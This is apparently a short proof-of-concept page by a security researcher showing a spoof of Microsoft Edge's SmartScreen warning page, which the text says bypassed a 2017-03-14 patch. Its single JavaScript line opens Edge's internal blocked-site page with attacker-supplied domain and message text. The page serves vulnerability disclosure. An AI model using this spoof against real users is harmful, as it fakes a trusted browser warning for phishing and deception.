Microsoft Edge - SmartScreen Page Spoof

Patched on 2017-03-14. Bypassed the same day. New PoC is here.






Explanation of this PoC can be found here: Spoofing the SmartScreen and Edge Internal Assets

The Code:

window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?" +
"BlockedDomain=" + tUrl.value + "&Host=" + taMsg.value + "#" + tUrl.value);



Questions? Ping me at @magicmac2000